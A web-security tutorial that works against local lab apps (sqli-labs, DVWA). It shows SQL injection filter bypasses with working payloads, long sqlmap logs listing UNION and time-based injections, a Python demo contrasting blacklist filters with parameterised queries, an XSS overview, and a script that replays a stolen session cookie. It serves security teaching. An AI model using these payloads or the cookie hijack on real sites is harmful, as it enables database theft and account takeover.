Python Full Stack (5): Web Security Attack and Defense, Part 8: XSS Attacks (I)

I. Bypassing SQL injection filters

1. Bypassing a filter that removes comment symbols

Purpose of comment symbols:
They annotate a piece of code and explain what it does; commented-out content is not executed.
Comment symbols in MySQL:

  • Single-line comments
    --+ , -- (followed by a space), #
  • Multi-line comments
    /* multi-line comment content */

In a normal SQL statement a comment symbol only serves as documentation;
when exploiting a SQL injection vulnerability, however, comment symbols are used to close off single quotes, multiple single quotes, double quotes, a single parenthesis or multiple parentheses.
When comment symbols are filtered and the single quote cannot be closed that way, switch approach and close it with a statement of the form or '1'='1.
Testing in SQL:

select * from users where id = '1' or '1' = '1';

Output:

+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
+----+----------+------------+
8 rows in set (0.00 sec)      

Visiting http://127.0.0.1/sqli-labs/Less-23/?id=1' or '1'='1 shows:
[Image: SQL injection, bypassing the comment filter]
Clearly no error is raised and the page is accessed normally.

2. Bypassing a filter that strips and / or

MySQL basics:

  • MySQL keywords are case-insensitive: uppercase and lowercase are treated the same
  • Hexadecimal and URL encoding in MySQL
  • Symbol and keyword substitution:
    replace and with &&, and or with ||

Visiting http://127.0.0.1/sqli-labs/Less-25/?id=1' or '1'='1 returns an error message (the input is filtered):
[Image: SQL injection, and/or filter]
The symbols can be used in place of or and and, for example:

select * from users where id = '1' || '1' = '1';

Output:

+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
+----+----------+------------+
8 rows in set (0.00 sec)      

|| has the same effect as or.
Testing again:

select * from users where username = 'admin' && password = 'admin';

Output:

+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | admin    |
+----+----------+----------+
1 row in set (0.00 sec)    

During injection testing, visiting http://127.0.0.1/sqli-labs/Less-25/?id=1' or '1'='1 may have the or stripped out, leaving http://127.0.0.1/sqli-labs/Less-25/?id=1' '1'='1, which now looks up the record with id 11 in the database.
Visiting http://127.0.0.1/sqli-labs/Less-25/?id=1' || '1'='1 shows:
[Image: SQL injection, and/or bypass test]

sqlmap security test

python sqlmap.py -u 127.0.0.1/sqli-labs/Less-25/?id=1 --dbs --batch

Output:

        ___                                                                                                                                               
       __H__                                                                                                                                              
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}                                                                                                                  
|_ -| . [']     | .'| . |                                                                                                                                 
|___|_  [)]_|_|_|__,|  _|                                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                                               
                                                                                                                                                          
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                          
[*] starting @ 19:56:04 /2020-03-12/                                                                                                                      
                                                                                                                                                          
[19:56:05] [INFO] testing connection to the target URL                                                                                                    
[19:56:07] [INFO] checking if the target is protected by some kind of WAF/IPS                                                                             
[19:56:09] [INFO] testing if the target URL content is stable                                                                                             
[19:56:11] [INFO] target URL content is stable                                                                                                            
[19:56:11] [INFO] testing if GET parameter 'id' is dynamic                                                                                                
[19:56:13] [INFO] GET parameter 'id' appears to be dynamic                                                                                                
[19:56:15] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')                                       
[19:56:17] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks                            
[19:56:17] [INFO] testing for SQL injection on GET parameter 'id'                                                                                         
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y                                          
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y                           
[19:56:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'                                                                              
[19:56:44] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'                                                                      
[19:56:46] [WARNING] reflective value(s) found and filtering out                                                                                          
[19:56:48] [INFO] testing 'Generic inline queries'                                                                                                        
[19:56:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'                                                              
[19:58:35] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'                                                               
[20:00:11] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'                                                         
[20:01:57] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'                                                  
[20:02:52] [INFO] GET parameter 'id' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --string="Login")
[20:02:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                   
[20:02:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'                                                        
[20:02:56] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'                                               
[20:02:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'                                                                    
[20:03:00] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'                                       
[20:03:02] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'                                                            
[20:03:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                             
[20:03:06] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                              
[20:03:08] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                      
[20:03:10] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                       
[20:03:12] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'                                         
[20:03:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'                                          
[20:03:16] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                             
[20:03:18] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'                                                                  
[20:03:20] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'                                                                         
[20:03:22] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'                                                                   
[20:03:24] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'                                                                
[20:03:24] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'                                                                            
[20:03:24] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'                                                                    
[20:03:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'                                                                          
[20:03:24] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'                                                                      
[20:03:24] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'                                                                   
[20:03:24] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'                                                        
[20:03:26] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'                                                                    
[20:03:28] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'                                                            
[20:03:30] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'                                                                  
[20:03:32] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'                                                           
[20:03:34] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'                                                              
[20:03:36] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'                                                                  
[20:03:38] [INFO] testing 'MySQL inline queries'                                                                                                          
[20:03:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'                                                                                     
[20:03:42] [INFO] testing 'MySQL >= 5.0.12 stacked queries'                                                                                               
[20:03:44] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'                                                                       
[20:03:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'                                                                                 
[20:03:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'                                                                        
[20:03:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'                                                                                  
[20:03:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'                                                                            
[20:03:55] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'                                                                             
[20:03:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'                                                                                  
[20:03:59] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'                                                                                   
[20:04:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'                                                                        
[20:04:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'                                                                         
[20:04:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'                                                                  
[20:04:07] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'                                                                   
[20:04:09] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'                                                                             
[20:04:11] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'                                                                              
[20:04:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'                                                                   
[20:04:15] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'                                                                    
[20:04:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'                                                                                        
[20:05:19] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind' injectable                                                    
[20:05:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'                                                                                  
[20:05:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'                                                                                    
[20:05:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found     
[20:06:02] [INFO] target URL appears to be UNION injectable with 3 columns                                                                                
[20:06:16] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable                                                           
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N                                                                
sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:                                                                  
---                                                                                                                                                       
Parameter: id (GET)                                                                                                                                       
    Type: boolean-based blind                                                                                                                             
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause                                                                   
    Payload: id=1' RLIKE (SELECT (CASE WHEN (3231=3231) THEN 1 ELSE 0x28 END))-- JwBt                                                                     
                                                                                                                                                          
    Type: time-based blind                                                                                                                                
    Title: MySQL >= 5.0.12 RLIKE time-based blind                                                                                                         
    Payload: id=1' RLIKE SLEEP(5)-- TZbF                                                                                                                  
                                                                                                                                                          
    Type: UNION query                                                                                                                                     
    Title: MySQL UNION query (NULL) - 3 columns                                                                                                           
    Payload: id=-6337' UNION ALL SELECT NULL,CONCAT(0x7178767871,0x635a545a4877775a7649456c7a576d4d4679465050687049475a41766e536161616375704570704c,0x716b717871),NULL#
---                                                                                                                                                       
[20:06:18] [INFO] the back-end DBMS is MySQL                                                                                                              
[20:06:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'                          
back-end DBMS: MySQL >= 5.0.12                                                                                                                            
[20:06:28] [INFO] fetching database names                                                                                                                 
[20:06:30] [WARNING] the SQL query provided does not return any output                                                                                    
[20:06:30] [INFO] fetching number of databases                                                                                                            
[20:06:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval                               
[20:06:30] [INFO] retrieved:                                                                                                                              
[20:06:36] [INFO] retrieved:                                                                                                                              
[20:06:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions       
                                                                                                                                                          
[20:06:42] [ERROR] unable to retrieve the number of databases                                                                                             
[20:06:42] [INFO] falling back to current database                                                                                                        
[20:06:42] [INFO] fetching current database                                                                                                               
available databases [1]:                                                                                                                                  
[*] security                                                                                                                                              
                                                                                                                                                          
[20:06:44] [INFO] fetched data logged to text files under 'XXXX\sqlmap\output\127.0.0.1'                                         
                                                                                                                                                          
[*] ending @ 20:06:44 /2020-03-12/

3. Bypassing a filter that removes spaces

Encodings:
hex, urlencode, and so on.

Symbol   URL encoding
Space    %20
TAB      %09

More URL encodings can be found at https://www.w3school.com.cn/tags/html_ref_urlencode.html
Visiting http://127.0.0.1/sqli-labs/Less-26/?id=1' --+ shows:
[Image: SQL injection, space filter]
Clearly the page is not accessed normally this time.

sqlmap security test

python sqlmap.py -u 127.0.0.1/sqli-labs/Less-26/?id=1 --hex --dbms=mysql --batch

Output:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:05:31 /2020-03-12/

[20:05:32] [INFO] testing connection to the target URL
[20:05:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:05:36] [INFO] testing if the target URL content is stable
[20:05:38] [INFO] target URL content is stable
[20:05:38] [INFO] testing if GET parameter 'id' is dynamic
[20:05:40] [INFO] GET parameter 'id' appears to be dynamic
[20:05:42] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:05:44] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:05:44] [INFO] testing for SQL injection on GET parameter 'id'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:05:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:06:06] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:06:10] [INFO] testing 'Generic inline queries'
[20:06:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:08:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:08:06] [WARNING] reflective value(s) found and filtering out
[20:09:39] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:11:33] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:13:59] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:16:54] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:20:13] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:23:18] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:26:29] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:29:46] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:31:37] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[09:31:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:31:41] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[09:31:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:31:46] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[09:31:50] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:31:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:31:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:31:58] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:31:58] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:31:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[09:33:36] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[09:33:36] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:35:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:37:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:38:56] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:40:42] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:42:28] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:44:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:45:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:47:45] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:49:30] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:51:16] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:53:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:54:47] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:56:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:58:18] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:59:07] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:00:20] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[10:00:22] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[10:00:24] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[10:00:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:00:29] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:00:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:00:33] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[10:00:37] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[10:00:41] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[10:00:45] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:00:49] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[10:00:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[10:00:57] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:01:01] [INFO] testing 'MySQL inline queries'
[10:01:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:01:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:03:09] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:03:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:05:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:06:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:07:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:09:09] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[10:10:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[10:12:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[10:14:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[10:15:20] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[10:16:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[10:17:34] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[10:18:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:20:27] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[10:22:07] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[10:23:16] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[10:24:25] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[10:26:05] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[10:27:12] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[10:28:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[10:29:59] [INFO] testing 'MySQL AND time-based blind (ELT)'
[10:31:45] [INFO] testing 'MySQL OR time-based blind (ELT)'
[10:33:24] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[10:34:31] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[10:35:38] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:36:51] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:37:34] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[10:37:36] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[10:37:38] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[10:37:40] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[10:37:42] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[10:37:44] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[10:37:46] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[10:37:50] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[10:37:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:38:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:40:08] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[10:42:06] [WARNING] GET parameter 'id' does not seem to be injectable
[10:42:06] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 10:42:06 /2020-03-13/


Note:
Character-encoding problems can sometimes cause data loss; the --hex switch can be used to avoid this.
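All three filters above block a keyword instead of fixing the query. As an added example (not sqli-labs code; the filter shapes are assumed from the lab descriptions above), the following Python models each filter, runs what survives it against an in-memory SQLite copy of the users table, and contrasts the parameterised query that binds the whole input as one value:

```python
import re
import sqlite3

# Constructed rows mirroring the sqli-labs users table shown above (not the lab's own data).
ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


# Three blacklist filters modelled on what the labs strip (assumed shape, not lab source code).
def strip_comments(value):
    """Less-23 style: remove the comment symbols --, #, /* and */."""
    return re.sub(r"--|#|/\*|\*/", "", value)


def strip_and_or(value):
    """Less-25 style: remove the words 'and' and 'or', case-insensitively."""
    return re.sub(r"and|or", "", value, flags=re.IGNORECASE)


def strip_spaces(value):
    """Less-26 style: remove the space character only (tabs survive)."""
    return value.replace(" ", "")


def build_unsafe_sql(filtered_id):
    """String concatenation: whatever survives the filter becomes SQL syntax."""
    return f"SELECT id, username FROM users WHERE id = '{filtered_id}'"


def lookup_unsafe(conn, raw_id, blacklist):
    """Blacklist plus concatenation. Returns the usernames the query exposes."""
    return [row[1] for row in conn.execute(build_unsafe_sql(blacklist(raw_id)))]


def lookup_safe(conn, raw_id):
    """Parameterised query: the whole input is bound as one literal value,
    so quotes, comment symbols, or/|| and tabs inside it are just characters."""
    rows = conn.execute("SELECT id, username FROM users WHERE id = ?", (raw_id,))
    return [row[1] for row in rows]


def demo():
    conn = make_db()
    out = {}
    # Less-23: comment symbols are stripped, so the quote is closed with or '1'='1 instead;
    # the filter never touches that payload and every row comes back.
    out["comment_filter"] = lookup_unsafe(conn, "1' or '1'='1", strip_comments)
    # Less-26: spaces are stripped, but a URL-encoded tab (%09) is still whitespace to the parser.
    out["space_filter"] = lookup_unsafe(conn, "1'\tor\t'1'='1", strip_spaces)
    # Less-25: 'or' is stripped, but || is left alone. In MySQL || is logical OR (the page's
    # point); SQLite reads || as string concatenation, so this case is shown as the SQL text
    # the filter lets through rather than executed here.
    out["and_or_filter_sql"] = build_unsafe_sql(strip_and_or("1' || '1'='1"))
    # Parameterised: the same payload matches nothing, while a normal id still works.
    out["parameterised_payload"] = lookup_safe(conn, "1' or '1'='1")
    out["parameterised_normal"] = lookup_safe(conn, "8")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```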

II. Cross-site scripting (XSS)

1. Introduction to the XSS vulnerability

Cross-site scripting (Cross Site Scripting):
To avoid confusion with the abbreviation for Cascading Style Sheets (CSS), cross-site scripting is abbreviated XSS.
A malicious attacker inserts malicious script code into a web page; when a user browses that page, the script embedded in it is executed, achieving the attacker's goal of attacking the user.
A simple outline of the attack:
[Image: basic principle of an XSS attack]

2. Introduction to cookies

A cookie is a way for a server or script, under the HTTP protocol, to keep information on the client workstation. A cookie is a small text file that the web server stores in the user's browser (the client); it contains information about the user.
How cookies work:
Because HTTP is a stateless protocol, the server cannot tell who the client is from the network connection alone. What to do? Issue every client a pass, one each, and require it to be carried on every visit. The server can then confirm the client's identity from the pass.

3. XSS categories

Reflected XSS

Reflected XSS, also called non-persistent XSS, is usually a one-off attack.
The attacker sends a link containing XSS code to a normal user, for example by email; when the user clicks it, the server accepts and processes the request, then sends the XSS code back to the user; the user's browser parses and executes the code, triggering the XSS vulnerability.
Reflected test:
[Image: XSS reflected test]
Clearly the cookie is obtained very easily.

Stored XSS

Stored XSS, also called persistent XSS, stores the attack script in the target server's database, which makes it much stealthier.
The attacker embeds XSS attack code while posting on a forum, blog or message board; the post is stored in the target server's database, and the XSS code fires whenever a user visits normally.
Stored test:
[Image: XSS stored test]

DOM-based XSS

DOM-based XSS (DOM stands for Document Object Model; the DOM is used to dynamically access and update a document's content, structure and style).
The server's response does not process the attacker's script; instead, when the user's browser processes the response, the DOM handles the XSS code and the vulnerability is triggered.
DOM test:
[Image: XSS DOM test]

4. Session hijacking with a cookie in Python

Add the obtained cookie to the request headers and simulate a visit with Python:

import requests

# Cookie obtained from the reflected-XSS test above; it only works while that session is valid
headers = {
    'Cookie': 'security=low; PHPSESSID=a3j2dd4aagnki7t47s2m2gjel3'
}

url = 'http://127.0.0.1/dvwa/index.php'
# Request the page with the session cookie attached
html = requests.get(url, headers=headers, timeout=10).text

# Save the response body; set the encoding so non-ASCII content is written correctly
with open('dvwa.html', 'w', encoding='utf-8') as f:
    f.write(html)

Open the resulting HTML file in a browser and you will see:
[Image: XSS Python cookie test]
Clearly the main data is obtained, only without the styling; without the cookie it could not be obtained.
